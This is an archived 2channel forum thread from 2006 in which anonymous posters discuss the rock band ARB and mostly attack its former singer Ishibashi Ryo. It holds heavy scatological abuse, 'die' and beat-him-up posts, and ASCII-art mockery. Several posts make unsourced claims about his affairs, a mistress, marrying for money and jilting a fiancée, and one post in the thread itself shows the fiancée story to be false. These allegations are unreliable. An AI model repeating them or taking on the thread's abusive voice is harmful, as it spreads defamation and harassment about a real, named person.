2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【いかれちまったぜ!】元ARBパートU【ARBの魂】

1 :伝説の名無しさん:2006/05/09(火) 18:56:36
     ミミ ヽヽヽヽリリノノノノ
    ミ   ,,、,、,、,、,、,、,、、 彡
     l  i''"        i彡
    .| 」   /' '\  |    
    ,r-/   -・=-, 、-・=- |    
    l       ノ( 、_, )ヽ  |  
    ー'    ノ、__!!_,.、  |  
     ∧     ヽニニソ   l   
   /\ヽ           /    
 /     ヽ.  `ー--一' ノ/ヽ ARBは辞めたが、今後は俳優として頑張っていくのでおまえら応援しろ!



ARBのオフィシャルサイト
http://www.arb-tamashii.com/





2 :伝説の名無しさん:2006/05/09(火) 18:57:19
〓〓〓現ARB(石橋凌)アンチスレ〓〓〓
http://music4.2ch.net/test/read.cgi/legend/1119185464/

永遠のギター小僧★田中一郎★でRR
http://music4.2ch.net/test/read.cgi/legend/1080910371/l50

◆ARBについて語ろう!!!◆
http://music4.2ch.net/test/read.cgi/legend/1100342725/l50


過去ログ:
**ARB**[伝説板]
http://music.2ch.net/legend/kako/1010/10109/1010917422.html

ARB あの頃の魂どこ?[伝説板]dat
http://music2.2ch.net/test/read.cgi/legend/1043023669/

我が青春の・・・ARB [30代以上板]dat
http://natto.2ch.net/test/read.cgi/middle/1035202736/

〓〓〓現ARB(石橋凌)アンチスレ〓〓〓
http://music4.2ch.net/test/read.cgi/legend/1119185464/

3 :伝説の名無しさん:2006/05/09(火) 22:22:39
性懲りもなく・・・

4 :伝説の名無しさん:2006/05/10(水) 18:00:01
これどうすんの?埋めるネタも無いのに。
落ちるの待つだけ?とageてみる。

5 :伝説の名無しさん:2006/05/11(木) 13:45:31
石橋凌、演技下手、人気も出ない、女好き、今はでぶおやじ。
昔の石橋凌を知っているが、昔からいい人ではなかったな。。
九州出身、本名石橋秀樹。

6 :伝説の名無しさん:2006/05/11(木) 17:59:41
石橋凌=裏切り者のチンカス野郎

7 :伝説の名無しさん:2006/05/12(金) 14:02:42
一生歌って逝きマス

8 :伝説の名無しさん:2006/05/12(金) 17:48:20
ARB時代、バンドだけでは生活出来なくて、他にも色々仕事をしてたけど
なぜその頃の石橋の悪行が噂にらないのか、不思議だな。。
その頃、女とやりまくってたのは本当だか。。

9 :伝説の名無しさん:2006/05/12(金) 17:53:24
>>8
凌じゃなくても女とはやりまくるだろ。
それが悪い事なのか?
お前はドーテーだなwwwwwwwwwwwwww

10 :伝説の名無しさん:2006/05/12(金) 22:51:15
昔のARENAでは結構正直にインタビューに答えてたみたいですね。
自分は、結婚後って、昔の彼女の話はしなくなる人が多いと思ってたけど
凌さんはそんなことないね。

ところで、悪行って、なんかやばいことでもしてたのですか?
若いうちはお金がないから色々やるかもしれないけど・・・

11 :伝説の名無しさん:2006/05/13(土) 03:36:08
お前らがどんだけ石橋をかばおうと、一般世間じゃダサイ野郎になってるぜ!

花園に背をむ〜けてぇ〜W

12 :伝説の名無しさん:2006/05/13(土) 16:06:30
相当昔にARBのスレが無かったから【ARBにイカれちまったぜ!】
って恥ずかしいタイトル付けて立てたら早速「イカれてるのはお前だよ」
とレスされ、しかも過疎状態ですぐオチちまったぜ!

13 :伝説の名無しさん:2006/05/13(土) 17:31:00
以後放置でお願いします

14 :伝説の名無しさん:2006/05/14(日) 11:08:12
     ミミ ヽヽヽヽリリノノノノ
    ミ   ,,、,、,、,、,、,、,、、 彡
     l  i''"        i彡
    .| 」   /' '\  |    
    ,r-/   -・=-, 、-・=- |    
    l       ノ( 、_, )ヽ  |  
    ー'    ノ、__!!_,.、  |  
     ∧     ヽニニソ   l   
   /\ヽ           /    
 /     ヽ.  `ー--一' ノ/ヽ


食えないロッカーから俳優に転職した俺が来ましたよ
俳優業は金になるし女食い放題、いい仕事だぜ!


15 :伝説の名無しさん:2006/05/15(月) 08:58:56
     ミミ ヽヽヽヽリリノノノノ
    ミ   ,,、,、,、,、,、,、,、、 彡
     l  i''"        i彡
    .| 」   /' '\  |    
    ,r-/   -・=-, 、-・=- |    
    l       ノ( 、_, )ヽ  |  
    ー'    ノ、__!!_,.、  |  
     ∧     ヽニニソ   l   
   /\ヽ           /    
 /     ヽ.  `ー--一' ノ/ヽ

俺を哀れんでもっと応援しろよ

16 :伝説の名無しさん:2006/05/16(火) 14:44:19
いま凌って何してるんだ?仕事もないだろうし。。。
凌は昔は嘘ばっかり言ってる嘘つき、詐欺師みたいな男だったよ(笑)
原田美枝子と結婚したのはいい金づるだからだよ
今は奥さんに食わしてもらってるんだろう。



17 :伝説の名無しさん:2006/05/16(火) 16:03:35
クソ石橋はロックンロールを舐めてたんだよ。
自業自得だね。市ね。

18 :伝説の名無しさん:2006/05/17(水) 19:10:05
どうして石橋ってこんな中途半端な男になったんだろ。

19 :伝説の名無しさん:2006/05/17(水) 21:10:40
今撮影してるんですか?
最近見ないような・・・
お元気なら、いいんですけど。

20 :伝説の名無しさん:2006/05/17(水) 21:13:48
>>18
松田優作にかぶれてダメになった。
というか、元々半端者だったんじゃないのか。

21 :伝説の名無しさん:2006/05/18(木) 17:51:38
カス石橋は今何やってんの?

22 :伝説の名無しさん:2006/05/18(木) 18:23:07
>>21カスは貴様だ

23 :伝説の名無しさん:2006/05/18(木) 19:54:14
それじゃチンカス石橋は今何やってんの?

24 :伝説の名無しさん:2006/05/18(木) 20:08:46
>>23
肛門にへばりついたウンカスみたいな顔してw

25 :伝説の名無しさん:2006/05/18(木) 20:41:37
それじゃ肛門にへばりついたウンカスみたいな顔してる石橋はどうなんだw

26 :伝説の名無しさん:2006/05/18(木) 20:53:12
>>25
心配すんな、お前が最強にウンカスなんだからWWWW

27 :伝説の名無しさん:2006/05/18(木) 23:04:52
おいおいおまいら止めとけよ
下痢便石橋なんかの為の争うな!

28 :伝説の名無しさん:2006/05/18(木) 23:12:59
ウンチ石橋に裏切られて精神崩壊すんぜんの信者たちW

29 :伝説の名無しさん:2006/05/19(金) 12:10:00
石橋の愛人も一度テレビで見たがものすごい不細工な女だったな
今も愛人に生活費、払ってんのかな?
しかし奥さんがいて愛人がいて、他にも女がいるだろうな。。
原田美枝子も早くこんな男と別れた方がいぞ!余計なお世話か(笑)

30 :伝説の名無しさん:2006/05/19(金) 12:10:06
ウンチ石橋は2度俺たちを裏切った。

絶対ゆるさない!。

31 :伝説の名無しさん:2006/05/19(金) 12:16:25
この男はそういう最低の男だよ!原田と結婚する前にこいつには
婚約者がいたのに、原田を妊娠させて、それで婚約者を裏切って
原田と結婚したんだから!!本当に最低の男!!
当時その婚約者はかなりつらい思いをしたらしいぞ!!


32 :伝説の名無しさん:2006/05/19(金) 12:20:19
こいつは人を裏切ることを屁とも思わない、最低の男だ!!

33 :伝説の名無しさん:2006/05/19(金) 12:24:38
キースもえびもこうやもみんな裏切られた。

34 :伝説の名無しさん:2006/05/19(金) 12:29:25
しかし石橋ってほんと口先だけの人間だったよな。
こいつの硬派な歌に感動した俺は馬鹿だったよ。
くっだらねぇ奴むかつくぜ。
このクソ野郎がどの面さげて世間様に出てくんのか見物だぜ。

35 :伝説の名無しさん:2006/05/19(金) 14:42:59
あのさぁ、石橋 凌のこと悪く言うなとはいわんけどさぁ、
もうちょっと事実を確認してから書き込もうよ。
 
 婚約85年、長男大河誕生88年。

 大河君は3年間も母親の腹の中にいたってか(大爆笑)

36 :伝説の名無しさん:2006/05/19(金) 20:22:15
(大爆笑)


37 :伝説の名無しさん:2006/05/19(金) 21:43:25
勝手に元婚約者つくられてる(笑)

38 :伝説の名無しさん:2006/05/20(土) 10:51:39
デブ石橋出て来い!。面見せてファンあやまれよ!。



39 :伝説の名無しさん:2006/05/20(土) 14:22:36
  _____________
 /|:: ┌──────┐ ::|
/.  |:: |  ∧_∧   .| ::| 
|.... |:: |  (^ε^  )!!  | ::| 
|.... |:: |  /J凌  J  | ::|
|.... |:: |  し―-J  | ::|  
|.... |:: └──────┘ ::|
\_|    ┌────┐   .|     ∧_∧ 石橋の演技=大根
    ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ .∬  (^ε^  )
           / ̄ ̄ ̄ ̄ ̄旦 ̄(_,   ミ
          /(^ε^  )        \、_ミ
         | ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄|
           ̄| ̄| ̄ ̄ ̄ ̄ ̄ ̄| ̄|



40 :伝説の名無しさん:2006/05/21(日) 11:18:56
石橋凌は身の程を知れ。

41 :伝説の名無しさん:2006/05/21(日) 13:29:34
↑ヒッキ−でニ−トのお前こそ身の程を知れ。

42 :伝説の名無しさん:2006/05/21(日) 15:59:40
そりゃそーだ

43 :伝説の名無しさん:2006/05/22(月) 13:49:16
最低男石橋を吊るしあげろ!。

44 :伝説の名無しさん:2006/05/22(月) 15:09:24
その前に、ヒッキ−でニ−トな↑のお前を
ボコボコにしてやりたい。

45 :伝説の名無しさん:2006/05/22(月) 15:36:47
信者乙。その前にブタ石橋の化けの皮を剥がしてやりたい。

46 :伝説の名無しさん:2006/05/22(月) 16:16:17
ニ−ト乙。さらにその前に貴様を部屋から、
実社会の荒波に放り込んでやりたい。

47 :伝説の名無しさん:2006/05/22(月) 17:33:13
>>46お前がヒッキーニートだろ
ウンチデブ石橋の手先め!。

48 :伝説の名無しさん:2006/05/22(月) 17:54:56
お前ら・・・文字でケンカすんなw

49 :伝説の名無しさん:2006/05/22(月) 21:41:13
     ミミ ヽヽヽヽリリノノノノ
    ミ   ,,、,、,、,、,、,、,、、 彡
     l  i''"        i彡
    .| 」   /' '\  |    
    ,r-/   -・=-, 、-・=- |     おまいら仕事無くて困ってるなら紹介してやろうか?
    l       ノ( 、_, )ヽ  |   エキストラ1日3千円でどうだ?
    ー'    ノ、__!!_,.、  |  
     ∧     ヽニニソ   l   
   /\ヽ           /    
 /     ヽ.  `ー--一' ノ/ヽ




50 :伝説の名無しさん:2006/05/23(火) 03:23:40
     ミミ ヽヽヽヽリリノノノノ
    ミ   ,,、,、,、,、,、,、,、、 彡
     l  i''"        i彡
    .| 」   /' '\  |    
    ,r-/   -・=-, 、-・=- |    
    l       ノ( 、_, )ヽ  |   俺がウンチデブの石橋です!
    ー'    ノ、__!!_,.、  |  
     ∧     ヽニニソ   l   
   /\ヽ           /    
 /     ヽ.  `ー--一' ノ/ヽ


51 :伝説の名無しさん:2006/05/23(火) 05:24:50
石橋は解散後、再結成で集まった時から確実に態度が変わっていたらしい。
もう完全に役者体質になっていたんだな。
スタッフ、社長、旧メンバー(キース)ともそう感じていたらしい。
何かにつけ扱い辛い人間になってしまっていた。俺は役者としてあそこまで頑張ってキャリアを築いたのに、
お前たちは何をやってたんだ、今のバンドの状況は何だ!とね
客は入らん、レコードは売れん、何でロックフェスに出れないんだ、インディーズでレコード出さなきゃいけないんだ、
役者というより手のかかる芸能人になってしまっていた。
社長もすっかりノイローゼ、スタッフもやめてしまった。
結局、再結成はするべきではなかったんだろう

52 :伝説の名無しさん:2006/05/23(火) 09:22:19
再結成の一枚目がグッバイ我がソコークーだもんなダメだこりゃ!

53 :伝説の名無しさん:2006/05/23(火) 09:25:11
奴みたいな奴が一番許せん!
メッセージソングを歌う資格無し!
守銭奴カス石橋!。

54 :精神科医:2006/05/23(火) 11:49:06
というわけで、ヒッキ−でニ−トな
アンチを名乗りながらも、誰よりも
石橋依存症な方の独白でした。

 本当に石橋 凌が嫌いな方は2ちゃんねる
には来ませんのであしからず。

55 :伝説の名無しさん:2006/05/23(火) 13:27:48
>>54それはお前だ。ウンチ石橋信者くんW。

56 :信者:2006/05/23(火) 14:24:10
↑といいながら、懲りずに反論している君は
立派な石橋依存症。そんな君に↓の3つが
出来るかな?

 1 ネット(特に2ちゃん)に最低でも10日以上
アクセスしない。

 2 ARBのCDもしくはDVD1ヶ月以上
聴かない

 3 ファンサイトに堂々とメアドを晒しファン
(君風に言うと信者)ときちんとした議論をする。

 さて君にこれが出来るかな?

57 :伝説の名無しさん:2006/05/23(火) 14:41:51
1、石橋依存症と関係ないだろ。
2、もう3年前くらいにARB関係の物は全部処分したよ。
3、なんでそんなマヌケな事するよ。信者もここまでくると惨めた゜ね。

教祖ウンチデブ最低石橋によろしく。

58 :伝説の名無しさん:2006/05/23(火) 15:07:57
わかったか?。ロックは片手間で出来る事じゃないの。
デブ糞石橋はなめてたんだよ。

59 :惨めなアンチ:2006/05/23(火) 18:28:23
>>57 
   1 結局、石橋 凌を2ちゃんで罵倒
    したり、下らんアスキ−でしか自分の存在証明
    をしてしか、自分の精神状態を維持することが
    出来ない。哀れな奴。

   2 処分した割りには、最近の活動詳しい嘘くさぁ〜
 
   3 マヌケと言いながら、単にビビッテるだけ。
    結局たんに、隠れて人の事を罵倒する事しか出来ない
    チキン。もしくは、ネットですら、きちんと人
    と議論が出来ない協調性がない駄目人間。

  以上。


60 :伝説の名無しさん:2006/05/23(火) 19:54:30
>>59のデブ糞石橋信者へ。
1、キモイ糞石橋信者こそが哀れの極致。
なんとかしてゲロ石橋のダサい行動を正当化しなければ
自分の精神状態を維持することが出来ない。(中には精神崩壊してるのもいる)
悲惨な信者達。

2、呆れて物が言えない様な事ばっかで詳しくもなるわな。

3、ケツの穴からウンチが見えてる様な下らん煽りだな。
さすがゲロウンチ石橋の信者だな。
    


61 :デブ糞アンチ:2006/05/23(火) 20:16:21
 >>61

 1 石橋 凌のことを全肯定しているファン
  は少数派、凌の行動や言動がおかしければ
  おかしいと言っているのはファンサイトを見れば
  明らか。

 2 呆れてものが言えないことでも、末期の
  ARBの情報源といえばネットのみ。それをこまめに
  チェックしているのは本当はARB好きな証拠

 3 煽りだとか人を罵倒しておいて話をはぐらかし
  てエスケ−プ。やっぱり君はチキンだね。

62 :伝説の名無しさん:2006/05/23(火) 20:17:48
>>61 自分にレスつけんなよw

63 :61:2006/05/23(火) 20:28:55
>>62 39

64 :伝説の名無しさん:2006/05/23(火) 22:09:53
結局、解散の原因は何?

65 :伝説の名無しさん:2006/05/24(水) 00:11:43
理由考えてみたけど

・歌うことがなくなった(ネタ切れ等)
・ライブはできても曲(歌詞)を作る時間がない
・ファンが嫌
(前列がいつも同じメンバーetc.)

66 :伝説の名無しさん:2006/05/24(水) 01:00:55
ワークソングがとりえだったのに、世間離れして書けなくなったから。

67 :伝説の名無しさん:2006/05/24(水) 01:12:33
オレ様を見に来てるはずなのに、気が付けばEBIちゃんと幸也しか見てない客に気付いたから(笑)

68 :伝説の名無しさん:2006/05/24(水) 05:33:07
キース、再結成するのをずっと待ってたのにかわいそうだね。
年齢的に次はもう無理かな・・・・

69 :伝説の名無しさん:2006/05/24(水) 18:19:19
原田美枝子超いい女
俺ならガンガンやりまくる
なんで外人孕ますか理解不能


70 :伝説の名無しさん:2006/05/24(水) 19:58:48
ガンガンやりまくって飽きたからジンガイと楽しんだのさ

71 :伝説の名無しさん:2006/05/25(木) 15:42:28
石橋は硬派でも何でもないただのスケコマシ野郎。

得意技はカッコイイセリフを考え付く事。
これでみんな騙された。

72 :伝説の名無しさん:2006/05/26(金) 20:57:40
いしばしもいちろーも結局はゴミダニか。。

73 :伝説の名無しさん:2006/05/26(金) 23:51:14
72さん、どさくさに紛れていちろーもゴミにしないで下さい

74 :伝説の名無しさん:2006/05/27(土) 00:29:28
石橋はキースに失業保険を払い続けるべきだ

75 :伝説の名無しさん:2006/05/27(土) 00:40:43
最近見ないけどどうしてるのかな
心配だよ・・・

76 :伝説の名無しさん:2006/05/27(土) 01:37:42
今はNEWマリオに熱中しているよ。

77 :伝説の名無しさん:2006/05/27(土) 02:22:37
枯れちまったぜ!

78 :伝説の名無しさん:2006/05/27(土) 02:38:57
今はNEWマリオになってジャンプしてるよ

79 :伝説の名無しさん:2006/05/27(土) 18:12:01
石橋うんこっこ

80 :伝説の名無しさん:2006/05/28(日) 00:54:33
デタラメ野郎

81 :伝説の名無しさん:2006/05/28(日) 02:39:37
トーキョー
アウトサイダー

82 :伝説の名無しさん:2006/05/28(日) 09:42:11
おりのかわいいきょうはんしゃよー

83 :伝説の名無しさん:2006/05/28(日) 18:10:22
グッバイ我が裏切り者!

84 :伝説の名無しさん:2006/05/28(日) 19:40:27
2003年、市川ジオってライブハウスの最前列で見たのが俺にとって最初で最後のARBですた…

ウィスキー&ウォッカって曲の時に凌さんが俺のかぶってた帽子を泥棒したんですよ!
マジレス

85 :伝説の名無しさん:2006/05/28(日) 20:27:59
指をならせ!

86 :伝説の名無しさん:2006/05/28(日) 21:38:52
>>84いい記念じゃね?

87 :伝説の名無しさん:2006/05/29(月) 01:12:19
名曲トラブルドキッズの
お前は友達もなく恋人もつくらないで毎日コンピューターと部屋の中で戯れているって歌詞は今の漏れにとって胸が痛いよ

88 :伝説の名無しさん:2006/05/29(月) 18:05:44
マーダーゲームにならない様に

89 :伝説の名無しさん:2006/05/29(月) 22:05:44
>>88うまい

90 :伝説の名無しさん:2006/05/29(月) 23:29:52
ウンチアゲ

91 :伝説の名無しさん:2006/05/29(月) 23:31:22
立つ鳥後を濁す石橋を忘れんな。

92 :伝説の名無しさん:2006/05/30(火) 16:40:11
>>87 がんばれ!!

93 :伝説の名無しさん:2006/06/01(木) 00:06:40
カス石橋糾弾age

94 :伝説の名無しさん:2006/06/01(木) 20:55:42
         ,. -──  .
       /       `ヽ
      /             \
    /               ',
    !                  l
    ;           --‐‐ .'  =
    レ ⌒ヽ'' ‐‐ - ,,__   rッr⌒ ;rァr 、
    { レ ゝ       ゙ '' ‐l   ハ/   !
    rハ  ゞ           ヽノ  :. ノ
 / {  ヽ .__          ヘ - 、ノ
/ !:::::ハ            ッツ;竺ヾ 散々人を振り回す石橋とはもう縁を切ったよ
  l::::::::\   \     y''ヽニフi}!
   l::::::::::::\   \  ,;ィ{,. ァ;ァ;}}
   !::::::::::::::::::::....__ >州川州i}}
  / l::::::::::::::::::::::::::::::::/''ツ彡州'
 /   l::::::::::::::::::::::::::::::|  ヽ  \
/    ハ::::::::::::::::::::::::::::|  /    ハ

95 :伝説の名無しさん:2006/06/02(金) 12:55:56
イタリアンレストランでバイトしてたくらいでワークソングなんて歌うな

96 :伝説の名無しさん:2006/06/02(金) 18:15:28
>>96大正解!

97 :伝説の名無しさん:2006/06/03(土) 18:16:45
石はもうダメだろ!

98 :伝説の名無しさん:2006/06/04(日) 18:19:11
>>97
お前の方がダメなのは世界中が認める事実だ

99 :伝説の名無しさん:2006/06/05(月) 08:53:14
意志の弱い凌くんは逃げました。

100 :伝説の名無しさん:2006/06/05(月) 11:18:08
無意味な100

101 :伝説の名無しさん:2006/06/06(火) 01:21:39
ウホッ

102 :伝説の名無しさん:2006/06/06(火) 03:46:41
         =≡= ∧_∧    ワン・ツー・スリー・フォー
          / サッ |(・∀・| )
        〆   〃⊂   ⊂) .∈≡∋
         ||  γ ⌒ヽヽコノ   .||
         || |   .|:::|∪〓  .||
        ./|\人 _.ノノ _||_  ./|\


                _∧_∧_∧_∧_∧_∧_∧_∧_
     デケデケ      |                         |
        ドコドコ   <  楽しもうぜ?!!!!!!!!!1      >
   ☆      ドムドム |_  _  _ _ _ _ _ _ _ _|
        ☆   ダダダダ! ∨  ∨ ∨ ∨ ∨ ∨ ∨ ∨ ∨
  ドシャーン!  ヽ         オラオラッ!!    ♪
         =≡= ∧_∧     ☆
      ♪   / 〃(・∀・ #)    / シャンシャン
    ♪   〆  ┌\と\と.ヾ∈≡∋ゞ
         ||  γ ⌒ヽヽコ ノ  ||
         || ΣΣ  .|:::|∪〓  ||   ♪
        ./|\人 _.ノノ _||_. /|\
         ドチドチ!

103 :伝説の名無しさん:2006/06/06(火) 11:41:06
凌くん最近見かけないけど引きこもってんのかな?

104 :伝説の名無しさん:2006/06/06(火) 16:09:49
りょうくんは泣いて逃げました。

105 :伝説の名無しさん:2006/06/06(火) 16:34:02
↑そういうこと言ってるお前こそ
都合が悪くなるとばっくれるくせに、
このくされニ−トのヒッキ−が!!

106 :伝説の名無しさん:2006/06/06(火) 17:05:01
別に僕が逃げても誰も気にしないけど。

りょうくんは逃げちゃだめでしょカッコ悪。

107 :ドレミふぁななし度:2006/06/06(火) 20:39:29
http://youtube.com/watch?v=IUvPE_iKw5U&search=arb
かっこよすぎる!BASSさんのベースに裸逝ってステッカーが!!かっこいい!
ギターさんもかっこいい!!ジャズマスターも最高だね!


108 :伝説の名無しさん:2006/06/07(水) 22:12:24
初めて「ARB」に出会ったのは、最初の解散の時に音楽番組で組まれた特集を
観たときだった。なんか、頭にガツーンときたのでCDを買い集めた。何年かして、
再結成のニュースを聞いた時はうれしかったな。でも再結成後のアルバムを何枚か
聞いてるうちに、「なんか解散(最初の)する前のアルバムのほうがよいなあ」と
思うようになった。自然と初期のアルバムを聴くようになった。「KAZABANA」を
聴いた時は、「久しぶりにいいアルバムだな」と思ってたのにまた解散だなんて・・・

109 :伝説の名無しさん:2006/06/08(木) 01:08:45
脱退前はちょっとだけテレビ、映画の露出が多かったが、脱退後は全然見ませんなぁ。以前所属してた鈍牛倶楽部も辞めたようで…
もうダメぢゃ…?
焦って、俺はやっぱり歌!とか言ってソロやっても、みんなバカぢゃないから、もう誰も行きませんよ。

110 :伝説の名無しさん:2006/06/08(木) 01:24:33
まあ自業自得じゃね?
過去のARBメンバーも過去のファンもそう思ってるよ

111 :伝説の名無しさん:2006/06/08(木) 03:02:03
鈍牛も辞めたんだ・・・

最近ファンサイト見てないもんで今知ったんですが
本当に何かあったんじゃないかと気がかりです。


鈍牛に自殺サークルの園子温が新たに入ったんだね。
グロい映画だったけど。

112 :伝説の名無しさん:2006/06/08(木) 03:08:21
http://plaza.harmonix.ne.jp/~pascal-j/inter_09koroshi.html
今こんなインタビュー見つけた。
「ごく普通の人間が、突然狂気に変わっていくコワさ。殺しのスカウトマンと出会って、
男の内面がどう変わっていくのか。殺すことが、次第に自分の生きる証になっていく男のこころの中を
どう表現していくのか。家族のことを思い、家族を養うために殺しをするごく普通の男。物語は現代の寓話とも
いうべきものなんですが、ウソになってもいけない。そのへんのさじ加減が難しかったですね」
「雪景色はとても雄弁なので、芝居が大きくならないように、引き算の芝居を心掛けました。芝居を大きくすると、
どうしても雪と喧嘩しちゃうんですね。男の気持ちの微妙なゆれや、変化を芝居しないでどう表現していくか、一番悩んだところです」
「監督からは、普通の男をやってくれ、と言われました。映画を見た人は、いつ石橋がキレるのかと思って見ている人が多かったみたいですが」
「撮影の前には、音楽の構想はありました。でも撮影が進む中で、止めることに。その結果、雪の中でゆっくり回る風車の音、雪を踏み締める音、銃声・・・
ひとつひとつの音がより鮮明に、印象的になったと思いますね」
「現場に入って緒形さんがどんな演技をするのか、とても楽しみでした。現場で確認し合いながら撮影は進みましたが、緒方さんの存在が大変刺激的でしたね。
僕は“復讐するは我にあり('79)”の緒方さんが大好きなんですが、役に応じて違うアプローチのできる幅の広さ、懐の深さ、大きさを感じました」
「初めて、本(シナリオ)を読んだとき、おもしろくて笑いが止まらなかった。緒方さんとの本読みの段階でも、同じところで笑いが止まらなかったんで、
緒形さんに“何か悪いことでもやってんじゃないの”といわれたくらいです」


113 :伝説の名無しさん:2006/06/09(金) 15:55:34
りょうくん映画出るんだ。
こけるだろね。

114 :伝説の名無しさん:2006/06/10(土) 00:01:59
NHKドラマ「 げんこつ 」のりょうがカラオケでストーンズ歌うシーンは 見て悲しくなった

115 :伝説の名無しさん:2006/06/10(土) 18:50:40
島田紳助&バスガス爆発楽団(しまだしんすけアンドバスガスばくはつがくだん) は、島田紳助を筆頭にで構成された歌手グループ。
テレビ朝日のアニメ番組『もーれつア太郎』の主題歌「がってん承知ノ介」(1990年5月1日、日本コロムビアから発売)を歌った(単発)ユニットである。

ユニットを命名するきっかけは、紳助が司会を担当していた『歌のトップテン』(日本テレビ系)をやり終え、「アーティストの曲紹介ってややこしい。
んなら、自分も紳助バンド以来、もう一度歌ったろか。ややこしい名前つけて。"バスがガス爆発"」とつぶやいたことから始まった。1990年5月25日、
タモリ司会の『ミュージックステーション』(テレビ朝日系)にゲストで出演したときには、「トップテンの司会、ランキングと曲紹介で大変だったんですよ」とエピソードを語ったこともあった。

なお、バンドとしての名義は「紳助&バスガス爆発楽団(しんすけアンドバスガスばくはつがくだん)」であるが、
Mステなどの音楽番組出演になると名義を「島田紳助&バスガス爆発楽団」に変えている。
[編集]
メンバー
島田紳助(Vo.)
高原兄(G.)- かつて「完全無欠のロックンローラー」をヒットさせたアラジンのヴォーカル。
日名子昭夫(G.)-元トムキャット
岡部滋(Bass G.)-元ARB
井筒稔晴(Key.)
玉村冬景(Ds.)



こんなとこで岡部発見

116 :伝説の名無しさん:2006/06/11(日) 23:14:44
りょうくんガンバ!!

117 :伝説の名無しさん:2006/06/12(月) 12:33:26
役者とかいってもさ
哀川翔・竹内力>>>>>>>的場>>>>>>清水健太郎>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>石橋凌だろ?

118 :伝説の名無しさん:2006/06/12(月) 13:00:24
下手くそ区祖カトゥーンカバヤカトゥーン

119 :伝説の名無しさん:2006/06/12(月) 19:25:46
とうもろこしウンチ石橋。

120 :伝説の名無しさん:2006/06/13(火) 12:59:04
>>117
石橋の ちょっと上に白竜 入れといてやんなよ

121 :伝説の名無しさん:2006/06/13(火) 21:18:39
120がイイコト逝った。

122 :伝説の名無しさん:2006/06/14(水) 16:45:39
っていうか石橋 凌を罵倒をすることでしか
自分の精神状態を維持することが出来んのかね?

 っていうこと書くと、信者っていって罵倒してくるか、
クダンネエアスキ−書くしかできない憐れで
あほらしい奴。

 一回2ちゃんとARBから離れて
実社会の荒波にもまれてみたら?


123 :伝説の名無しさん:2006/06/14(水) 23:43:55
>>122
貴様がどう見繕って見てもウンカス石橋に変わりはない。

124 :伝説の名無しさん:2006/06/15(木) 01:50:46
実社会の荒波に揉まれてストレスが貯まりすぎて、やり場がなくて石橋がちょうどいいターゲットになってんじゃね?
ショボいけど。

125 :伝説の名無しさん:2006/06/15(木) 12:15:18
超えられないVシネマの壁wwwwwww

126 :伝説の名無しさん:2006/06/15(木) 12:22:33
石橋もメッキが禿げたね。

127 :伝説の名無しさん:2006/06/15(木) 12:37:37
ヤクザもんやりてーんなら北大路欣也の爪垢でも飲め

128 :伝説の名無しさん:2006/06/15(木) 15:10:02
りょうくんはママのおっぱいがほちいのでつか?

129 :伝説の名無しさん:2006/06/15(木) 15:22:56
石橋と出合った人間はみんな思うだろーな。
こいつがファンを裏切り騙し続けたクソ野郎かと。

130 :伝説の名無しさん:2006/06/15(木) 15:24:10
口だけウンチ石橋。

131 :伝説の名無しさん:2006/06/15(木) 16:29:29
わかった↑の君は単なる2ちゃんプラス
石橋罵倒依存症の基地外だったのねぇ。

 うんこ以下じゃん。

132 :伝説の名無しさん:2006/06/15(木) 16:46:02
石橋も罵倒されてもしょうがない存在だけどな。

133 :伝説の名無しさん:2006/06/15(木) 20:01:36
たしかにりょうくんはダサイから仕方ない。

134 :伝説の名無しさん:2006/06/15(木) 22:00:15
骨のねー男には誰もついてこないぜ。

135 :伝説の名無しさん:2006/06/15(木) 23:53:20
薄っぺらなのがバレて、どこからもお呼びなしか?
最近、マジ見ねぇなぁ。
増毛でもしてるのか?

136 :伝説の名無しさん:2006/06/16(金) 00:37:36
かっこつけ石橋凌クソ食らえ。

137 :伝説の名無しさん:2006/06/16(金) 21:13:01
     ミミ ヽヽヽヽリリノノノノ
    ミ   ,,、,、,、,、,、,、,、、 彡
     l  i''"        i彡
    .| 」   /' '\  |    
    ,r-/   -・=-, 、-・=- |    
    l       ノ( 、_, )ヽ  |  
    ー'    ノ、__!!_,.、  |  
     ∧     ヽニニソ   l   
   /\ヽ           /    
 /     ヽ.  `ー--一' ノ/ヽ お前らは俺の言う事聞いてりゃいいの。また歌ってやるから
                 それまで大人しくしてまってろ。

138 :伝説の名無しさん:2006/06/16(金) 22:32:48
>>137
うんこ石橋は喋るな。

139 :伝説の名無しさん:2006/06/16(金) 23:05:25
     ミミ ヽヽヽヽリリノノノノ
    ミ   ,,、,、,、,、,、,、,、、 彡
     l  i''"        i彡
    .| 」   /' '\  |    
    ,r-/   -・=-, 、-・=- |    
    l       ノ( 、_, )ヽ  |  
    ー'    ノ、__!!_,.、  |  
     ∧     ヽニニソ   l   
   /\ヽ           /    
 /     ヽ.  `ー--一' ノ/ヽバカ野郎今まで散々俺様の歌を聞かせてやってきただろ。
                それだけでありがたく思え。もっと俺の歌を周りに広めろ。
                そしたら又歌ってやるからよ。

140 :伝説の名無しさん:2006/06/17(土) 00:18:09
クソ野郎石橋をぶん殴りてーーーーーー!!

141 :伝説の名無しさん:2006/06/17(土) 01:12:50
うんちゃんりょうくんしね

142 :伝説の名無しさん:2006/06/17(土) 01:50:26
117の序列は本気なのか?

143 :伝説の名無しさん:2006/06/17(土) 01:51:02
>>117
アンカー忘れたw

144 :伝説の名無しさん:2006/06/17(土) 12:33:56
石橋凌ってやくざ役しか仕事ないよね


145 :伝説の名無しさん:2006/06/17(土) 15:56:18
≫140 じゃあ、実際に殴ってみれば
誰も止めないよ。


146 :伝説の名無しさん:2006/06/17(土) 16:17:25
↑    ↑    ↑    ↑    ↑    ↑    

       あほぉ





147 :伝説の名無しさん:2006/06/17(土) 18:55:34
     ミミ ヽヽヽヽリリノノノノ
    ミ   ,,、,、,、,、,、,、,、、 彡
     l  i''"        i彡
    .| 」   /' '\  |    
    ,r-/   -・=-, 、-・=- |    
    l       ノ( 、_, )ヽ  |  
    ー'    ノ、__!!_,.、  |  
     ∧     ヽニニソ   l   
   /\ヽ           /    
 /     ヽ.  `ー--一' ノ/ヽ 騙されたオメーらが悪いんだ!バーーーカ!
                 

148 :伝説の名無しさん:2006/06/17(土) 23:12:59
死ねウンチ石橋デブはげ

